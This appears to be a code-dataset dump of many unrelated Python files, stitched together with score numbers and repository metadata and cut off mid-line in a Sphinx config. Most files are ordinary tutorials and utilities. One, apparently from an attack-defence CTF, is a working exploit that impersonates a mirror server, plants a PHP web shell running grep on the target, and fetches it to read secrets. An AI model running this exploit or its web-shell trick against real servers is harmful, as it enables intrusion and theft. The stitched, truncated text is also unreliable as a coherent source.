# Add this sub-project to the Python path
sys.path.append(os.path.dirname(os.path.realpath(__file__)))

from json_to_object.reverse_entity import ReverseEntity
from object_to_json.entity import Entity


class ObjectFiwareConverter(object):
    """This class should primarily be used to convert an Object <-> JSON-string.

    The classes in the subdirectories are used to convert either into JSON
    or into a Python-specific object.
    """

    @classmethod
    def obj2Fiware(cls, _object, ind=0, dataTypeDict={}, ignorePythonMetaData=False,
                   showIdValue=True, encode=False):
        en = Entity()
        en.setObject(_object, dataTypeDict, ignorePythonMetaData,
                     showIdValue=showIdValue, encode=encode)
        return cls._json(en, ind)

    @classmethod
    def fiware2Obj(cls, _fiwareEntity, _objectStructure={}, useMetaData=True,
                   ignoreWrongDataType=False, setAttr=False, encoded=False):
        if isinstance(_fiwareEntity, str):
            jsonObj = cls._obj(_fiwareEntity)
        else:
            jsonObj = _fiwareEntity
        re = ReverseEntity(**jsonObj)
        return re.setObject(_objectStructure, useMetaData, ignoreWrongDataType,
                            setAttr, encoded=encoded)

    @classmethod
    def _complex_handler(cls, Obj):
        if hasattr(Obj, '__dict__'):
            return Obj.__dict__
        else:
            raise TypeError('Object of type %s with value of %s is not JSON serializable' % (
                type(Obj), repr(Obj)))

    @classmethod
    def _json(cls, obj, ind=0):
        return json.dumps(obj.__dict__, default=cls._complex_handler, indent=ind)

    @classmethod
    def _obj(cls, json_str):
        return json.loads(json_str)
2.140625
2
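A round-trip usage sketch for the converter above, assuming the module is importable as object_fiware_converter and that setAttr=True makes fiware2Obj write the decoded attributes onto the supplied object; the Room class and its fields are invented for illustration:

from object_fiware_converter import ObjectFiwareConverter

class Room(object):
    def __init__(self):
        self.temperature = 21.5
        self.pressure = 720

# Serialize an object to the Fiware JSON format, then decode it back.
json_str = ObjectFiwareConverter.obj2Fiware(Room(), ind=2)
room = Room()
ObjectFiwareConverter.fiware2Obj(json_str, room, setAttr=True)
print(room.temperature)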
Loops/ForLoop1.py
lytranp/Tutoring-PythonIntroduction
0
12789931
<gh_stars>0
## There are 2 types of loops:
#    definite iteration
#    and indefinite iteration, which continues until the program determines to stop

## for loop: the control statement that most easily supports definite iteration
for eachPass in range(4):
    print("It's alive!", end=" ")

number = 2
exponential = 3
product = 1
for i in range(exponential):
    product = product * number
    print(product, end=" ")

## Compute the sum of a sequence of numbers from a lower bound through an upper bound
lower = int(input("Enter the lower bound: "))
upper = int(input("Enter the upper bound: "))
thesum = 0
for number in range(lower, upper + 1):
    thesum += number
print(thesum)
4.1875
4
code/012.py
i4leader/Python-Basic-Pratice-100question
0
12789932
<filename>code/012.py
#!/usr/bin/python3
import math

count = 0
leap = 1
for i in range(101, 201):
    k = int(math.sqrt(i + 1))
    for j in range(2, k + 1):
        if i % j == 0:
            leap = 0
            break
    if leap == 1:
        print(i)
        count += 1
    leap = 1
print("Total number of primes: %d" % count)
3.796875
4
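The leap flag in the record above can be avoided with Python's for ... else clause, which runs the else block only when the inner loop finishes without hitting break; an equivalent sketch:

import math

count = 0
for i in range(101, 201):
    for j in range(2, int(math.sqrt(i)) + 1):
        if i % j == 0:
            break
    else:  # no divisor found, so i is prime
        print(i)
        count += 1
print("Total number of primes: %d" % count)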
components/footer.py
nt409/dash_template
0
12789933
<filename>components/footer.py<gh_stars>0
import dash_html_components as html

footer = html.Footer([
    html.Div(
        html.Div([
            html.A("Home", href="/", className="footer-navlink"),
            html.A("Model", href="/model", className="footer-navlink"),
            html.A("Data", href="/data", className="footer-navlink"),
        ],
            className="footer-wrapper footer-link-cont",
        ),
        className="footer-links"),
    html.Div(
        html.Div([
            "Some footer text"
        ],
            className="footer-wrapper"),
        className="foot-container",
    ),
],
)
2.140625
2
src/models/components/utils.py
philip-mueller/lovt
3
12789934
<filename>src/models/components/utils.py<gh_stars>1-10
from abc import ABC, abstractmethod
from dataclasses import dataclass
from functools import partial
from typing import Optional, Union, Tuple, Any

import torch
from omegaconf import MISSING
from torch import nn
import torch.nn.functional as F
from torch.utils.data.dataloader import default_collate

from common.dataclass_utils import TensorDataclassMixin


def get_norm_layer(norm: Optional[str], d):
    if norm is None:
        return lambda x: x
    elif norm == 'layer':
        return nn.LayerNorm(d)
    elif norm == 'batch':
        return nn.BatchNorm1d(d)
    elif norm == 'l2':
        return partial(F.normalize, dim=-1, p=2)
    else:
        raise NotImplementedError


@dataclass
class EncoderConfig:
    _encoder_cls_: str = MISSING
    modality: str = MISSING


class EncoderInterface(ABC):
    def __init__(self):
        super(EncoderInterface, self).__init__()
        self.transform = lambda x: x
        self.val_transform = lambda x: x
        self.batch_collator = default_collate

    @property
    def max_region_size(self):
        return None

    @abstractmethod
    def update_data_augmentation(self, data_augmentation_config: Optional[Any] = None):
        ...


@dataclass
class AttentionMask(TensorDataclassMixin):
    binary_mask: torch.Tensor
    inverted_binary_mask: torch.Tensor
    additive_mask: torch.Tensor

    @staticmethod
    def from_binary_mask(binary_mask: torch.Tensor, dtype):
        if binary_mask is not None:
            binary_mask = binary_mask.bool()
            additive_mask = AttentionMask._compute_additive_attention_mask(binary_mask, dtype)
            return AttentionMask(binary_mask, ~binary_mask, additive_mask)

    @staticmethod
    def from_binary_mask_or_attention_mask(mask: Optional[Union['AttentionMask', torch.Tensor]], dtype):
        if mask is None or isinstance(mask, AttentionMask):
            return mask
        else:
            assert isinstance(mask, torch.Tensor) and (mask.dtype in (torch.bool, torch.uint8, torch.int64)), \
                (type(mask), mask.dtype)
            return AttentionMask.from_binary_mask(mask, dtype)

    @staticmethod
    def _compute_additive_attention_mask(binary_attention_mask: torch.Tensor, dtype):
        if binary_attention_mask is None:
            return None
        additive_attention_mask = torch.zeros_like(binary_attention_mask, dtype=dtype)
        additive_attention_mask.masked_fill_(~binary_attention_mask, float('-inf'))
        return additive_attention_mask

    @staticmethod
    def get_additive_mask(mask: Optional[Union['AttentionMask', torch.Tensor]], dtype):
        if mask is None:
            return None
        if isinstance(mask, AttentionMask):
            return mask.additive_mask
        elif mask.dtype == torch.bool or mask.dtype == torch.uint8:
            return AttentionMask._compute_additive_attention_mask(mask, dtype)
        else:
            return mask

    @staticmethod
    def get_additive_cross_attention_mask(mask_a: Optional['AttentionMask'] = None,
                                          mask_b: Optional['AttentionMask'] = None,
                                          mask_ab: Optional['AttentionMask'] = None):
        """
        :param mask_a: (B x N_a)
        :param mask_b: (B x N_b)
        :param mask_ab: (B x N_a x N_b)
        :return:
        """
        if mask_a is None and mask_b is None and mask_ab is None:
            return None
        else:
            mask = 0.
            if mask_ab is not None:
                mask = mask + mask_ab.additive_mask
            if mask_a is not None:
                mask = mask + mask_a.additive_mask[:, :, None]
            if mask_b is not None:
                mask = mask + mask_b.additive_mask[:, None, :]
            return mask


@dataclass
class EncoderOutput(TensorDataclassMixin):
    local_features: Optional[torch.Tensor]
    global_features: Optional[torch.Tensor]
    local_structure_size: Union[int, Tuple[int, int]]
    local_mask: Optional[AttentionMask] = None
    local_weights: Optional[torch.Tensor] = None
2.1875
2
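A small demonstration of the additive-mask idea used by AttentionMask above: adding -inf to masked logits before softmax drives the corresponding attention weights to exactly zero. This is a standalone sketch, independent of the classes in the record:

import torch
import torch.nn.functional as F

scores = torch.tensor([[2.0, 1.0, 0.5]])           # raw attention logits
binary_mask = torch.tensor([[True, True, False]])  # False = masked out

additive = torch.zeros_like(scores)
additive.masked_fill_(~binary_mask, float('-inf'))

weights = F.softmax(scores + additive, dim=-1)
print(weights)  # the masked position receives weight 0.0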
sploits/startup/startup_sploit.py
vient/proctf-2019
2
12789935
#!/usr/bin/python3
import socket
import requests
import sys

if len(sys.argv) < 3:
    print("Usage: ./startup_sploit <host> <my_ip>")
    exit(1)

PORT = 3255
HOST = sys.argv[1]
MYIP = sys.argv[2]
MYPORT = "0" * (921 - len(MYIP)) + "4000"

MANIFEST = '{"links": [{"url": "http://mirror/wyjzmw.php", "checksum": "32bfce7a147d2fb0c87ff234c2848a37"}, {"url": "http://mirror/JhXY.php", "checksum": "d55ec508be338092ab591f3d7e4ab929"}]}'
SIGNATURE = 'c2f5e7a6e44e2fc4076a5930df75b02220c5f9313e0f3faa7ecb4e281dca359bc12426715e7c2902934e6995c9cdbcda93b8c4e0e5993f25309267b79978f504'

FAKE_PHP = br"""<?php if($_GET["key"]=="KnfSM")system("grep '=\";' *")?>"""

PAYLOAD = b"""AAAAAA
Url: http://%s:%s/JhXY.php
Success: true
Hashsum: d55ec508be338092ab591f3d7e4ab929\n\n\n\n\n\n\n\n\n\n
Content-Length: %d
%s""" % (MYIP.encode(), MYPORT.encode(), len(FAKE_PHP), FAKE_PHP)

ANS = b"""HTTP/1.1 200 OK
Content-Length: %d
%s?>""" % (len(PAYLOAD), PAYLOAD)

c = socket.socket()
c.connect((HOST, PORT))
from_client = c.makefile("r")
to_client = c.makefile("w")

print(from_client.readline().strip())
print(from_client.readline().strip())
to_client.write("%s:%s\n" % (MYIP, MYPORT)); to_client.flush()
print(from_client.readline().strip())
to_client.write(MANIFEST + "\n"); to_client.flush()
print(from_client.readline().strip())
to_client.write(SIGNATURE + "\n"); to_client.flush()

s = socket.socket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(("0.0.0.0", int(MYPORT)))
s.listen()
cl, cl_info = s.accept()
print("Got connection from %s, sending files" % (cl_info,))
cl.sendall(ANS)

print(from_client.readline().strip())
print(from_client.readline().strip())
print(from_client.readline().strip())

print(requests.get("http://%s/JhXY.php?key=KnfSM" % HOST).text)
2.390625
2
Patterns/Adapter_solution.py
alex123012/Coursera_Python_and_Django
0
12789936
<filename>Patterns/Adapter_solution.py


class MappingAdapter:
    def __init__(self, adaptee):
        self.adaptee = adaptee

    def lighten(self, grid):
        lights, obstacles = self.__find_all(grid)
        height, width = len(grid[0]), len(grid)
        self.adaptee.set_dim((height, width))
        self.adaptee.set_lights(lights)
        self.adaptee.set_obstacles(obstacles)
        return self.adaptee.generate_lights()

    def __find_all(self, grid):
        lights = []
        obstacles = []
        for i, j in enumerate(grid):
            for k, g in enumerate(j):
                if g == 1:
                    lights.append((k, i))
                if g == -1:
                    obstacles.append((k, i))
        return lights, obstacles


if __name__ == '__main__':
    class Light:
        def __init__(self, dim):
            self.dim = dim
            self.grid = [[0 for i in range(dim[0])] for _ in range(dim[1])]
            self.lights = []
            self.obstacles = []

        def set_dim(self, dim):
            self.dim = dim
            self.grid = [[0 for i in range(dim[0])] for _ in range(dim[1])]

        def set_lights(self, lights):
            self.lights = lights
            self.generate_lights()

        def set_obstacles(self, obstacles):
            self.obstacles = obstacles
            self.generate_lights()

        def generate_lights(self):
            return self.grid.copy()

    class System:
        def __init__(self):
            self.map = self.grid = [[0 for i in range(30)] for _ in range(20)]
            self.map[5][7] = 1   # light sources
            self.map[5][2] = -1  # walls

        def get_lightening(self, light_mapper):
            self.lightmap = light_mapper.lighten(self.map)
            # for i in self.lightmap:
            #     print(i)

    sys = System()
    # Light expects its dimensions at construction time, so the adapter must
    # wrap an instance, not the class itself (the original passed the class).
    sys.get_lightening(MappingAdapter(Light((30, 20))))
3.03125
3
scripts/properties_parser.py
Cypheruim/minebot
1
12789937
from dataclasses import dataclass


# Parser to read and modify Minecraft server.properties files
@dataclass
class PropertiesParser:
    file_path: str
    data: dict

    def __init__(self, file_path: str):
        self.file_path = file_path
        self.data = None

    # Gets the value of a property
    def get(self, prop: str):
        return self.data.get(prop)

    # Sets property 'prop' to 'val'
    def set(self, prop: str, val: str):
        self.data[prop] = val

    def __enter__(self):
        self.data = dict()
        with open(self.file_path, "r") as f:
            for l in f:
                line = l.strip()
                # Skip comments
                if line.startswith("#"):
                    continue
                values = line.split("=")
                if len(values) != 2:
                    continue
                prop, val = values
                self.data[prop] = val
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        self.save()
        self.data = None

    # Saves the data to the original file
    # Comments are not saved since they're not important
    def save(self):
        with open(self.file_path, "w") as f:
            for prop, val in self.data.items():
                f.write(f"{prop}={val}\n")
3.484375
3
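A usage sketch for PropertiesParser as a context manager; the file name and property keys are illustrative, and the parser assumes the file already exists. On exit, save() rewrites the file with the updated properties (comments are dropped):

with PropertiesParser("server.properties") as props:
    print(props.get("max-players"))      # read a property
    props.set("motd", "A Minecraft Server")  # modify a property
# leaving the block writes the changes back to server.properties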
iniciante/python/1065-pares-entre-cinco-numeros.py
tfn10/beecrowd
0
12789938
<filename>iniciante/python/1065-pares-entre-cinco-numeros.py


def pares():
    valores_pares = i = 0
    while i < 5:
        numero = int(input())
        if numero % 2 == 0:
            valores_pares += 1
        i += 1
    print(f'{valores_pares} valores pares')


pares()
3.765625
4
readable/__init__.py
amalchuk/readable
0
12789939
# Copyright 2020-2021 <NAME>. All rights reserved.
# This project is licensed under the terms of the MIT License.

"""
Check and improve the spelling and grammar of documents.
"""
1.40625
1
ccal/is_str_version.py
alex-wenzel/ccal
0
12789940
def is_str_version(str_):
    str_split = str_.split(sep=".")
    return "." in str_ and len(str_split) == 3 and all(i.isnumeric() for i in str_split)
3.140625
3
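The function accepts exactly three dot-separated numeric components; a few behavior checks:

assert is_str_version("1.2.3")       # three numeric components
assert not is_str_version("1.2")     # only two components
assert not is_str_version("1.2.x")   # non-numeric component
assert not is_str_version("123")     # no dots at all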
python/13_File_IO/04_rw_binfile.py
ihaolin/script-repo
0
12789941
<reponame>ihaolin/script-repo
import array

nums = array.array('i', [1, 2, 3, 4])
with open('data.bin', 'wb') as f:
    f.write(nums)

a = array.array('i', [0, 0, 0, 0, 0, 0])
with open('data.bin', 'rb') as f:
    f.readinto(a)

print(a)
2.609375
3
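One detail worth noting about the snippet above: the destination array has six slots but the file holds only four integers, so readinto() fills just the first four and returns the number of bytes actually read. A sketch that uses that return value to slice off only the items that were read:

import array

nums = array.array('i', [1, 2, 3, 4])
with open('data.bin', 'wb') as f:
    f.write(nums.tobytes())

a = array.array('i', [0] * 6)
with open('data.bin', 'rb') as f:
    n_bytes = f.readinto(a)  # number of bytes actually read

n_items = n_bytes // a.itemsize
print(a[:n_items])  # array('i', [1, 2, 3, 4]); the last two slots stay 0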
setup.py
ASKBOT/askbot-slack
3
12789942
<gh_stars>1-10
from setuptools import setup

setup(
    name="askbot-slack",
    version="0.1.3",
    classifiers=[
        "Development Status :: 5 - Production/Stable",
        "Intended Audience :: Developers",
        "Programming Language :: Python :: 2",
        "Programming Language :: Python :: 2.6",
        "Programming Language :: Python :: 2.7",
    ],
    py_modules=['askbot_slack'],
    install_requires=['askbot', 'requests'],
    author="<NAME>",
    author_email="<EMAIL>",
    description="Simple Slack integration for Askbot.",
    long_description="When questions are created, edited or responded to in Askbot, a message is sent to a specified channel in Slack.",
    license="MIT",
    keywords="askbot slack integration",
    url="https://github.com/jonmbake/askbot-slack",
    include_package_data=True,
    zip_safe=False,
)
1.398438
1
yugioh/ISMCTS.py
mnoyes68/yu-gi-oh
0
12789943
<reponame>mnoyes68/yu-gi-oh<filename>yugioh/ISMCTS.py
import random
import math

import numpy as np
import logging


class Node():
    def __init__(self, player, opponent, turn_number, is_player_turn):
        self.player = player
        self.opponent = opponent
        self.info_set = InfoSet(player, opponent)
        self.turn_number = turn_number
        self.sims = 0
        self.wins = 0
        self.edges = []
        if is_player_turn:
            self.turn = player
        else:
            self.turn = opponent
        self.set_terminal_status()

    def set_terminal_status(self):
        if self.player.life_points == 0 or self.opponent.life_points == 0:
            self.terminal = True
        else:
            self.terminal = False

    def get_actions(self):
        actions = []
        for edge in self.edges:
            actions.append(edge.action)
        return actions

    def isLeaf(self):
        if len(self.edges) > 0:
            return False
        else:
            return True


class Edge():
    def __init__(self, pre_node, post_node, action):
        self.pre_node = pre_node
        self.post_node = post_node
        self.turn = pre_node.turn
        self.action = action


class InfoSet():
    def __init__(self, player, opponent):
        self.player_hand = player.hand
        self.player_board = player.board
        self.opponent_hand_size = opponent.hand.get_size()
        self.opponent_board = opponent.board

    def __eq__(self, other):
        if isinstance(other, InfoSet):
            return (self.player_hand == other.player_hand and
                    self.player_board == other.player_board and
                    self.opponent_hand_size == other.opponent_hand_size and
                    self.opponent_board == other.opponent_board)
        return False

    def __ne__(self, other):
        return not self.__eq__(other)

    def __hash__(self):
        # sorted(...) replaces the original .sort() calls on generator
        # expressions, which have no sort method.
        player_hand_ids = sorted(o.card_id for o in self.player_hand.get_cards())
        player_board_ids = sorted(o.card_id for o in self.player_board.get_monsters())
        player_grave_ids = sorted(o.card_id for o in self.player_board.graveyard.get_cards())
        opponent_board_ids = sorted(o.card_id for o in self.opponent_board.get_monsters())
        opponent_grave_ids = sorted(o.card_id for o in self.opponent_board.graveyard.get_cards())
        return hash(str(player_hand_ids) + ":" + str(player_board_ids) + ":" +
                    str(player_grave_ids) + ":" + str(self.opponent_hand_size) + ":" +
                    str(opponent_board_ids) + ":" + str(opponent_grave_ids))


class ISMCTS():
    def __init__(self, root):
        self.root = root
        self.tree = set()
        self.add_node(root)

    def __len__(self):
        return len(self.tree)

    def add_node(self, node):
        self.tree.add(node)

    def select_sim_node(self):
        current_node = self.root
        edges = []
        logging.debug('Traversing ISMCTS')
        while not current_node.isLeaf():
            # edge_choice = random.choice(current_node.edges)
            max_score = 0
            for edge in current_node.edges:
                node_score = (edge.pre_node.wins / float(edge.pre_node.sims))
                ucb1_score = self.ucb1(node_score, edge.pre_node.sims, edge.post_node.sims)
                if ucb1_score > max_score:
                    edge_choice = edge
                    max_score = ucb1_score
            edges.append(edge_choice)
            current_node = edge_choice.post_node
        return current_node, edges

    def expand(self, pre_node, player, opponent, action, turn_number, is_player_turn):
        post_node = Node(player, opponent, turn_number, is_player_turn)
        edge = Edge(pre_node, post_node, action)
        pre_node.edges.append(edge)
        self.tree.add(post_node)
        return edge, post_node

    def back_propogate(self, node, edges, player_wins):
        # print "Backpropogating with", len(edges), "edges"
        current_node = node
        while current_node is not None:
            # print "Iterating through back propogation"
            current_node.sims += 1
            if player_wins:
                current_node.wins += 1
            if not edges:
                current_node = None
            else:
                edge = edges.pop(-1)
                current_node = edge.pre_node

    def ucb1(self, node_score, total_sims, edge_sims):
        c = math.sqrt(2)
        # c = .1
        return node_score + (c * math.sqrt(np.log(total_sims) / edge_sims))
2.734375
3
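The ucb1 method above implements the standard UCB1 rule: an exploitation term (win rate) plus an exploration bonus that grows with the parent's visit count and shrinks as the child is visited. A small standalone numeric check with c = sqrt(2):

import math

def ucb1(win_rate, parent_sims, child_sims, c=math.sqrt(2)):
    # Exploitation plus an exploration bonus that decays with child visits.
    return win_rate + c * math.sqrt(math.log(parent_sims) / child_sims)

# A rarely visited child can outrank a sibling with a higher win rate:
print(ucb1(0.60, parent_sims=100, child_sims=50))  # ~1.029
print(ucb1(0.40, parent_sims=100, child_sims=5))   # ~1.757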
DynamicProgramming/PalindromicSubstrings.py
LinXueyuanStdio/leetcode
0
12789944
<filename>DynamicProgramming/PalindromicSubstrings.py<gh_stars>0
'''
Given a string, your task is to count how many palindromic substrings are in this string.

Substrings with different start indexes or end indexes are counted as different
substrings even if they consist of the same characters.

Example 1:
Input: "abc"
Output: 3
Explanation: Three palindromic strings: "a", "b", "c".

Example 2:
Input: "aaa"
Output: 6
Explanation: Six palindromic strings: "a", "a", "a", "aa", "aa", "aaa".

Note: The input string length won't exceed 1000.
'''


class Solution(object):
    def countSubstrings(self, s):
        """
        :type s: str
        :rtype: int
        """
        ans = 0
        # Expand around each of the 2n-1 possible palindrome centers
        # (every character and every gap between characters).
        for center in range(2 * len(s) - 1):
            left = center // 2
            right = left + center % 2
            while left >= 0 and right < len(s) and s[left] == s[right]:
                ans += 1
                left -= 1
                right += 1
        return ans
4.15625
4
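A quick check of countSubstrings against the docstring examples:

sol = Solution()
assert sol.countSubstrings("abc") == 3  # "a", "b", "c"
assert sol.countSubstrings("aaa") == 6  # "a" x3, "aa" x2, "aaa"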
contentcuration/contentcuration/migrations/0040_file_assessment_item.py
Tlazypanda/studio
1
12789945
# -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-11-07 22:29
from __future__ import unicode_literals

import django.db.models.deletion
from django.db import migrations
from django.db import models


class Migration(migrations.Migration):

    dependencies = [
        ('contentcuration', '0039_auto_20161101_1555'),
    ]

    operations = [
        migrations.AddField(
            model_name='file',
            name='assessment_item',
            field=models.ForeignKey(blank=True, null=True,
                                    on_delete=django.db.models.deletion.CASCADE,
                                    related_name='files',
                                    to='contentcuration.AssessmentItem'),
        ),
    ]
1.484375
1
docs/conf.py
airr-community/airr-standards
35
12789946
<reponame>airr-community/airr-standards #!/usr/bin/env python3 # -*- coding: utf-8 -*- # # airr-standards documentation build configuration file, created by # sphinx-quickstart on Fri Nov 17 14:47:21 2017. # # This file is execfile()d with the current directory set to its # containing dir. # # Note that not all possible configuration values are present in this # autogenerated file. # # All configuration values have a default; values that are commented out # serve to show the default. # If extensions (or modules to document with autodoc) are in another directory, # add these directories to sys.path here. If the directory is relative to the # documentation root, use os.path.abspath to make it absolute, like shown here. # -- Imports ---------------------------------------------------------------- import csv import os import sys import yaml import yamlordereddictloader from unittest.mock import MagicMock # -- Python environment ---------------------------------------------------- # Python system path sys.path.append(os.path.abspath('.')) # Mock modules for ReadTheDocs if os.environ.get('READTHEDOCS', None) == 'True': class Mock(MagicMock): @classmethod def __getattr__(cls, name): return MagicMock() mock_modules = ['numpy', 'pandas'] sys.modules.update((mod_name, Mock()) for mod_name in mock_modules) # -- General configuration ------------------------------------------------ # Setup # def setup(app): # # Can also be a full URL # app.add_stylesheet('submenus.css') # app.add_stylesheet("overrides.css") rst_prolog =''' .. |br| raw:: html <br /> ''' # Minimal Sphinx version needs_sphinx = '1.6' # Sphinx extension modules extensions = ['sphinx.ext.autodoc', 'sphinx.ext.napoleon', 'sphinxcontrib.autoprogram', 'rstjinjaext'] # Define source file extensions source_suffix = ['.rst'] # List of patterns, relative to source directory, that match files and # directories to ignore when looking for source files. exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store'] # Add any paths that contain templates here, relative to this directory. templates_path = ['_templates'] # The master toctree document. master_doc = 'index' # General information about the project. project = 'AIRR Standards' copyright = '2017-2021, AIRR Community' author = 'AIRR Community' # The name of the Pygments (syntax highlighting) style to use. highlight_language = 'bash' pygments_style = 'vs' # If true, `todo` and `todoList` produce output, else they produce nothing. todo_include_todos = False # -- Options for HTML output ------------------------------------------ # Add any paths that contain custom static files (such as style sheets) here, # relative to this directory. They are copied after the builtin static files, # so a file named "default.css" will overwrite the builtin "default.css". 
html_static_path = ['_static'] # HTML help htmlhelp_basename = 'airr-standardsdoc' # Alabaster options # html_theme = 'alabaster' # html_theme_options = {'github_user': 'airr-community', # 'github_repo': 'airr-standards', # 'github_button': True, # 'sidebar_includehidden': True, # 'sidebar_width': '300px', # 'extra_nav_links': {'AIRR Community': 'http://airr-community.org'}} # html_sidebars = {'**': ['about.html', # 'navigation.html', # 'searchbox.html']} # PyData options # html_theme = "pydata_sphinx_theme" html_theme = "sphinx_book_theme" html_logo = "_static/AIRR_logo-only.png" # Bootstrap options # html_theme = 'bootstrap' # html_theme_path = sphinx_bootstrap_theme.get_html_theme_path() # html_sidebars = {'**': ['searchbox.html', 'globaltoc.html']} # html_sidebars = {'**': ['globaltoc.html']} # html_sidebars = {'**': ['globaltoc.html', 'sourcelink.html', 'searchbox.html']} # html_sidebars = {'**': ['searchbox.html', 'globaltoc.html']} # html_theme_options = { # # Navigation bar title. (Default: ``project`` value) # 'navbar_title': 'AIRR Community Standards', # # # Tab name for entire site. (Default: "Site") # 'navbar_site_name': 'Contents', # # # A list of tuples containing pages or urls to link to. # # Valid tuples should be in the following forms: # # (name, page) # a link to a page # # (name, "/aa/bb", 1) # a link to an arbitrary relative url # # (name, "http://example.com", True) # arbitrary absolute url # # Note the "1" or "True" value above as the third argument to indicate # # an arbitrary url. # # 'navbar_links': [('GitHub', 'https://github.com/airr-community/airr-standards', True), # # ('AIRR-C', 'http://airr-community.org', True)], # # # Render the next and previous page links in navbar. (Default: true) # 'navbar_sidebarrel': True, # # # Render the current pages TOC in the navbar. (Default: true) # 'navbar_pagenav': True, # # # Tab name for the current pages TOC. (Default: "Page") # 'navbar_pagenav_name': 'Page', # # # Global TOC depth for "site" navbar tab. (Default: 1) # # Switching to -1 shows all levels. # 'globaltoc_depth': 1, # # # Include hidden TOCs in Site navbar? # # # # Note: If this is "false", you cannot have mixed ``:hidden:`` and # # non-hidden ``toctree`` directives in the same page, or else the build # # will break. # # # # Values: "true" (default) or "false" # 'globaltoc_includehidden': 'false', # # # HTML navbar class (Default: "navbar") to attach to <div> element. # # For black navbar, do "navbar navbar-inverse" # 'navbar_class': 'navbar', # # # Fix navigation bar to top of page? # # Values: "true" (default) or "false" # 'navbar_fixed_top': 'true', # # # Location of link to source. # # Options are "nav" (default), "footer" or anything else to exclude. # 'source_link_position': 'none', # # # Bootswatch (http://bootswatch.com/) theme. # # # # Options are nothing (default) or the name of a valid theme # # such as "cosmo" or "sandstone". # # # # The set of valid themes depend on the version of Bootstrap # # that's used (the next config option). # # # # Currently, the supported themes are: # # - Bootstrap 2: https://bootswatch.com/2 # # - Bootstrap 3: https://bootswatch.com/3 # 'bootswatch_theme': 'spacelab', # # # Choose Bootstrap version. # # Values: "3" (default) or "2" (in quotes) # 'bootstrap_version': '2', # } # -- Options for LaTeX output --------------------------------------------- latex_elements = { # The paper size ('letterpaper' or 'a4paper'). # # 'papersize': 'letterpaper', # The font size ('10pt', '11pt' or '12pt'). 
# # 'pointsize': '10pt', # Additional stuff for the LaTeX preamble. # # 'preamble': '', # Latex figure (float) alignment # # 'figure_align': 'htbp', } # Grouping the document tree into LaTeX files. List of tuples # (source start file, target name, title, # author, documentclass [howto, manual, or own class]). latex_documents = [ (master_doc, 'airr-standards.tex', 'airr-standards Documentation', 'AIRR Community', 'manual'), ] # -- Options for manual page output --------------------------------------- # One entry per manual page. List of tuples # (source start file, name, description, authors, manual section). man_pages = [ (master_doc, 'airr-standards', 'airr-standards Documentation', [author], 1) ] # -- Options for Texinfo output ------------------------------------------- # Grouping the document tree into Texinfo files. List of tuples # (source start file, target name, title, author, # dir menu entry, description, category) texinfo_documents = [ (master_doc, 'airr-standards', 'airr-standards Documentation', author, 'airr-standards', 'One line description of project.', 'Miscellaneous'), ] # -- Build schema reference tables ---------------------------------------- # Function to chop down long strings of the table def wrap_col(string, str_length=11): """ String wrap """ if [x for x in string.split(' ') if len(x) > 25]: parts = [string[i:i + str_length].strip() for i in range(0, len(string), str_length)] return ('\n'.join(parts) + '\n') else: return (string) def parse_schema(spec, schema): """ Parse an AIRR schema object for doc tables Arguments: spec (str): name of the schema object schema (dict): master schema dictionary parsed from the yaml file. Returns: list: list of dictionaries with parsed rows of the spec table. """ data_type_map = {'string': 'free text', 'integer': 'positive integer', 'number': 'positive number', 'boolean': 'true | false'} # Get schema properties = schema[spec]['properties'] required = schema[spec].get('required', None) # Iterate over properties table_rows = [] for prop, attr in properties.items(): # Standard attributes required_field = False if required is None or prop not in required else True title = attr.get('title', '') example = attr.get('example', '') description = attr.get('description', '') # Data type data_type = attr.get('type', '') data_format = data_type_map.get(data_type, '') # Arrays if data_type == 'array': if attr['items'].get('$ref') is not None: sn = attr['items'].get('$ref').split('/')[-1] data_type = 'array of :ref:`%s <%sFields>`' % (sn, sn) elif attr['items'].get('type') is not None: data_type = 'array of %s' % attr['items']['type'] elif attr.get('$ref') == '#/Ontology': data_type = ':ref:`Ontology <OntoVoc>`' elif attr.get('$ref') is not None: sn = attr.get('$ref').split('/')[-1] data_type = ':ref:`%s <%sFields>`' % (sn, sn) # x-airr attributes if 'x-airr' in attr: xairr = attr['x-airr'] nullable = xairr.get('nullable', True) deprecated = xairr.get('deprecated', False) identifier = xairr.get('identifier', False) # MiAIRR attributes miairr_level = xairr.get('miairr', '') miairr_set = xairr.get('set', '') miairr_subset = xairr.get('subset', '') # Set data format for ontologies and controlled vocabularies if 'format' in xairr: if xairr['format'] == 'ontology' and 'ontology' in xairr: base_dic = xairr['ontology'] ontology_format = (str(base_dic['top_node']['id']), str(base_dic['top_node']['label']) ) # Replace name with url-linked name data_format = 'Ontology: { top_node: { id: %s, value: %s}}' % (ontology_format) # Get 'type' for ontology example 
= 'id: %s, value: %s' % (example['id'], example['label']) elif xairr['format'] == 'controlled vocabulary': if attr.get('enum', None) is not None: data_format = 'Controlled vocabulary: %s' % ', '.join(attr['enum']) elif attr.get('items', None) is not None: data_format = 'Controlled vocabulary: %s' % ', '.join(attr['items']['enum']) else: nullable = True deprecated = False identifier = False miairr_level = '' miairr_set = '' miairr_subset = '' if deprecated: field_attributes = 'DEPRECATED' else: f = ['required' if required_field else 'optional', 'identifier' if identifier else '', 'nullable' if nullable else ''] field_attributes = ', '.join(filter(lambda x: x != '', f)) # Return dictionary r = {'Name': prop, 'Set': miairr_set, 'Subset': miairr_subset, 'Designation': title, 'Field': prop, 'Type': data_type, 'Format': data_format, 'Definition': description, 'Example': example, 'Level': miairr_level, 'Required': required_field, 'Deprecated': deprecated, 'Nullable': nullable, 'Identifier': identifier, 'Attributes': field_attributes} table_rows.append(r) return(table_rows) # Load data for schemas with open(os.path.abspath('../specs/airr-schema.yaml')) as ip: airr_schema = yaml.load(ip, Loader=yamlordereddictloader.Loader) html_context = {'airr_schema': airr_schema} # Iterate over schema and build reference tables data_elements = {} for spec in airr_schema: if 'properties' not in airr_schema[spec]: continue # Storage object data_elements[spec] = parse_schema(spec, airr_schema) # Update doc html_context html_context[spec + '_schema'] = data_elements[spec] # -- Write download tables ------------------------------------------------ # Write download spec files download_path = '_downloads' if not os.path.exists(download_path): os.mkdir(download_path) # Write MiAIRR TSV fields = ['Set', 'Subset', 'Designation', 'Field', 'Type', 'Format', 'Level', 'Definition', 'Example'] tables = ['Study', 'Subject', 'Diagnosis', 'Sample', 'CellProcessing', 'NucleicAcidProcessing', 'PCRTarget', 